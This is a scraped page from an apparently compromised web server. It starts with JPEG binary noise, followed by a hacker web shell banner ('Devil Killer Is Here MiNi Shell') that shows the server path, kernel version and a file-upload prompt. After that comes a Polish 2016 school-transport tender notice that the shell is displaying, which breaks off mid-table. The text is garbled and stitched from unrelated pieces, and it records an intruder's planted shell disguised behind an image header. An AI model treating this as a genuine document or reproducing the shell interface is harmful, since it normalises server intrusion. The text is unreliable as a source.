JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160613/82287-N-2016.html

<p class="kh_header"><b>Dąbrowa Górnicza: Przewóz uczniów z rejonu Zespołu Szkół nr 4 - Gimnazjum Nr 8 w Dąbrowie Górniczej na wyznaczonych przez Zamawiającego trasach do i z  budynku  szkoły przy ulicy Łęknice  35 do i z wyznaczonych punktów na terenie Dąbrowy Górniczej oraz sprawowanie opieki w czasie przewozu.</b><br>
<b>Numer ogłoszenia: 82287 - 2016; data zamieszczenia: 13.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Nr 4 im. Królowej Jadwigi , Łęknice 35, 41-303 Dąbrowa Górnicza, woj. śląskie, tel. 032 2611022, faks 032 2611022.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zs4-dg.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przewóz uczniów z rejonu Zespołu Szkół nr 4 - Gimnazjum Nr 8 w Dąbrowie Górniczej na wyznaczonych przez Zamawiającego trasach do i z  budynku  szkoły przy ulicy Łęknice  35 do i z wyznaczonych punktów na terenie Dąbrowy Górniczej oraz sprawowanie opieki w czasie przewozu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie będzie prowadzone w ramach przetargu nieograniczonego o wartości zamówienia poniżej kwoty 209.000,00 Euro. Usługa transportowa - Przewóz uczniów z rejonu Zespołu Szkół nr 4 - Gimnazjum Nr 8 w Dąbrowie Górniczej na wyznaczonych przez Zamawiającego trasach do i z  budynku  szkoły przy ulicy Łęknice  35 do i z wyznaczonych punktów na terenie Dąbrowy Górniczej oraz sprawowanie opieki w czasie przewozu. Zamawiający przewiduje złożenie ofert częściowych  na zadania: A i (-lub) B i (-lub) C i (-lub) D przy czym:zadanie A obejmuje trasę I; zadanie B obejmuje trasę  II; zadanie C obejmuje trasę III;zadanie D obejmuje trasę IV;Wykonawca zobowiązuje się dowozić uczniów z rejonu Gimnazjum nr 8 z wyznaczonych punktów na terenie Dąbrowy Górniczej do siedziby szkoły przy ulicy Łęknice 35 oraz odwozić z gimnazjum po zakończonych zajęciach do wyznaczonych punktów na terenie Dąbrowy Górniczej oraz zapewnić opiekę nad uczniami w trakcie przywozu i odwozu uczniów. Trasy przewozu:
Zadanie A: Trasa I: Błędów Zagórze - Błędów Kościół - Błędów Szkoła- Łazy Błędowskie - Wypaleniska - Gimnazjum nr 8 ul. Łęknice 35; 
Zadanie B: Trasa II: Łęka - Łosień - Łosień Kościół - Łosień Szkoła - Gimnazjum nr 8           ul. Łęknice 35;
Zadanie C: Trasa III: Rudy - Kuźniczka Nowa - Okradzionów Szkoła - Okradzionów skrzyżowanie - Gimnazjum nr 8 ul. Łęknice 35;
Zadanie D: Trasa IV: Ujejsce Kryniczna - Ujejsce Wolności - Ujejsce skrzyżowanie - Trzebiesławice Gródki Pętla - Trzebiesławice Gródki - Trzebiesławice Glinianki - Trzebiesławice Glinianki Pętla - Trzebiesławice Podwarpie - Trzebiesławice Kościół - Ujejsce Parkowa -  Gimnazjum nr 8 ul. Łęknice 35.
Czas przewozu:
Przewóz do gimnazjum w godz. 645 - 800
Odwóz z gimnazjum w godz. 1330 - 1630
Termin przyjazdu i odjazdu do uzgodnienia, uzależniony od rozkładu zajęć uzgodniony z dyrektorem szkoły. W przypadku zaistnienia zmian w rozkładzie zajęć dyrektor szkoły telefonicznie uzgadnia je z przewoźnikiem dzień wcześniej. W szczególnie uzasadnionych przypadkach czas przewozu może być zmieniony za uzgodnieniem jednodniowym telefonicznie przez dyrektora szkoły.
Długość tras - podana liczba kilometrów jest wartością łączną (przywóz i odwóz) na jeden dzień:
Zadanie A: długość trasy I - 44 km
(przywóz-odwóz, bez kilometrów dojazdowych) - 39 uczniów + opiekun
Zadanie B: długość trasy II - 34 km 
(przywóz-odwóz, bez kilometrów dojazdowych) - 31 uczniów + opiekun
Zadanie C: długość trasy III - 44  km 
(przywóz-odwóz, bez kilometrów dojazdowych) - 26 uczniów + opiekun
Zadanie D: długość trasy III - 62  km 
(przywóz-odwóz, bez kilometrów dojazdowych) - 41 uczniów + opiekun.
Wykonawca zobowiązany jest do posiadania sprawnego taboru samochodowego, na każde zadanie jeden ogrzewany pojazd podstawowy plus jeden zastępczy, z tym że:
- w zadaniu A liczba miejsc siedzących minimum 39 + opiekun,
- w zadaniu B liczba miejsc siedzących minimum 31 + opiekun,
- w zadaniu C liczba miejsc siedzących minimum 26 + opiekun,
- w zadaniu D liczba miejsc siedzących minimum 41 + opiekun,
Zadeklarowane środki transportu w ramach poszczególnych zadań mają posiadać aktualne badania techniczne i mają być sprawne do należytego wykonania zamówienia oraz posiadać aktualne ubezpieczenie OC i NW oraz powinny być wyprodukowane po roku 1996 - dot. zad. A, B, C i D.
W razie awarii pojazdu wykonującego przewóz uczniów przewoźnik zobowiązany jest do podstawienia zastępczego pojazdu o równorzędnym standardzie i odpowiedniej liczbie miejsc nie później niż w ciągu 1 godziny od zaistnienia zdarzenia.
Wykonawca zobowiązany jest do zapewnienia opieki nad uczniami w trakcie przewozu. Pod pojęciem opieka rozumie się zapewnienie bezpieczeństwa podczas wsiadania, wysiadania i przejazdu uczniów pojazdem aż do momentu  odebrania uczniów przez pracownika szkoły w momencie ich przywozu oraz do momentu opuszczenia przez uczniów pojazdu na wskazanych przystankach autobusowych w momencie ich odwozu.
Opiekun zobowiązany jest do prowadzenia ewidencji uczniów obecnych w danym dniu podczas przywozu i odwozu, i do codziennego przekazywania informacji wyznaczonemu pracownikowi szkoły.
W przypadku zaistnienia wypadku lub innego zdarzenia drogowego opiekun jest zobowiązany udzielić pierwszej pomocy, powiadomić odpowiednie służby lub zadzwonić pod numer tel. 112, zabezpieczyć miejsce zdarzenia, powiadomić dyrektora szkoły i podstawić zastępczy pojazd o równorzędnym standardzie            i odpowiedniej liczbie miejsc nie później niż w ciągu 1 godziny od zaistnienia zdarzenia.
Koszt kilometrów dojazdowych oraz koszt opiekuna należy uwzględnić w cenie oferty.
Wykonawca w okresie realizacji przedmiotu umowy musi posiadać aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę  nie mniejszą niż 50.000,00 zł (słownie: pięćdziesiąt  tysięcy złotych). Nie później niż w ostatnim dniu ważności ubezpieczenia Wykonawca przedstawi Zamawiającemu kopię polisy lub innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności o przedłużonym terminie ważności. Wykonawca zobowiązuje się do posiadania nieprzerwanej ochrony ubezpieczeniowej w całym okresie obowiązywania umowy. 
Wykonawca zobowiązany jest posiadać licencję na wykonywanie krajowego transportu drogowego osób  na podstawie art. 5 ust. 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2013r. poz. 1414 z późn. zm.) aktualną przez cały okres obowiązywania umowy, zgodnie z wymogiem w ofercie. 
Zadeklarowane środki transportu w ramach poszczególnych zadań mają posiadać aktualne badania techniczne i mają być sprawne do należytego wykonania zamówienia oraz posiadać aktualne ubezpieczenie OC i NW oraz powinny być wyprodukowane po roku 1996, zgodnie z wymogiem w ofercie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenia zamówienia uzupełniającego zgodnie z art. 67 ust. 1 pkt. 6 ustawy do wysokości 50% wartości zamówienia podstawowego opisanego w specyfikacji. Zamówienie uzupełniające będzie udzielone w sytuacji kiedy na trasach: I, II, III i IV zwiększy się liczba uczniów spowodowana zmianą miejsca ich zamieszkania i nastąpi konieczność przejazdu uczniów pojazdem posiadającym większą liczbę miejsc. W przypadku gdy warunki dopuszczające możliwość udzielenia zamówienia uzupełniającego zostaną spełnione, zawarcie umowy musi zostać poprzedzone procedurą udzielenia zamówienia publicznego. Zakres sformalizowania procedury udzielenia zamówienia uzupełniającego będzie zależny od jego wartości szacunkowej. Jednak bez względu na wartość udzielanego zamówienia uzupełniającego zlecenie jego wykonania będzie potwierdzone zawarciem umowy pomiędzy Zamawiającym        a Wykonawcą.  W przypadku zlecenia uzupełniającego jego zakres oraz wartość będą określone w treści umowy, która będzie odnosić się do zapisów zawartych w umowie podstawowej.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że: posiada licencję na wykonywanie krajowego transportu drogowego osób - zgodnie           z wymogami ustawy z dn. 6 września 2001 r. o transporcie drogowym (Dz. U. z 2013 r., poz. 1414 z późn. zm.) - dot. zad. A, B, C i D.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że: w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli czas prowadzenia działalności jest krótszy - w tym okresie, wykonał a w przypadku świadczeń okresowych lub ciągłych, również jest w trakcie wykonywania, co najmniej 2 usług w zakresie przewozu osób. Jeżeli Wykonawca składa ofertę na dwa lub więcej zadań za spełnienie warunku jw. uznana zostanie realizacja dwóch zadań jw. - dot. zad. A, B, C  i D
Uwagi: 
1. W przypadku, gdy Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełniania warunku doświadczenia, zobowiązany jest wykazać udział tych podmiotów w wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że:              dysponuje sprawnym sprzętem niezbędnym do realizacji zamówienia, tj. do każdej trasy  w  każdym zadaniu minimum jeden ogrzewany pojazd podstawowy plus minimum jeden zastępczy. Pojazdy powinny posiadać: w zadaniu A liczba miejsc siedzących minimum 39 oraz miejsce dla opiekuna, w zadaniu B - liczba miejsc siedzących minimum 31 oraz miejsce dla opiekuna, w zadaniu C - liczba miejsc siedzących minimum 26 oraz miejsce dla opiekuna, w zadaniu D - liczba miejsc siedzących minimum 41 oraz miejsce dla opiekuna.
Zadeklarowane środki transportu w ramach poszczególnych zadań mają posiadać aktualne badania techniczne i mają być sprawne do należytego wykonania zamówienia oraz posiadać aktualne ubezpieczenie OC i NW oraz powinny być wyprodukowane po roku 1996 - dot. zad. A, B, C i D.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zadania stanowiącego przedmiot zamówienia: 
- min. jedną osobą na każde zadanie posiadającą, prawo jazdy kategorii D - pełniącą funkcję kierowcy oraz 
- min. jedną osobą na każde zadanie, która jest osobą pełnoletnią i posiada przygotowanie pedagogiczne (ukończony kurs w zakresie przygotowania pedagogicznego lub wykształcenie pedagogiczne) i posiada przygotowanie w zakresie udzielania pierwszej pomocy - pełniącą funkcję opiekuna - dot. zad. A, B, C i D.
Zamawiający nie dopuszcza łączenia funkcji kierowcy i opiekuna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania A i zadania B i zadania C i zadania D.
Zamawiający wymaga by Wykonawca był ubezpieczony od odpowiedzialności cywilnej        w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 50.000,00 złotych lub dla walut obcych na kwotę w wysokości równoważnej liczonej według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym zamieszczone zostało ogłoszenie o niniejszym zamówieniu w BZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy usług pozwalających wykazać, iż Wykonawca spełnia warunek określony w sekcji III.3.2 ogłoszenia o zamówieniu.
W wykazie nie należy podawać informacji o usługach niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 ustawy (zdanie 2).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Dowód oddania przez Podwykonawcę niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie  polegać na zasobach Podwykonawcy - zgodnie z art. 26 ust. 2b Ustawy: Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy  - wg wzoru Zamawiającego załącznik nr 3A, i (-lub) 3B, i (-lub) 3C i (-lub) 3D do SIWZ - wskazana data podpisania.
Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone 
w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
Dowód oddania przez Podwykonawcę niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie  polegać na zasobach Podwykonawcy - zgodnie z art. 26 ust. 2b Ustawy: Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Emisja dwutlenku węgla przez pojazdy używane do realizacji usługi - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
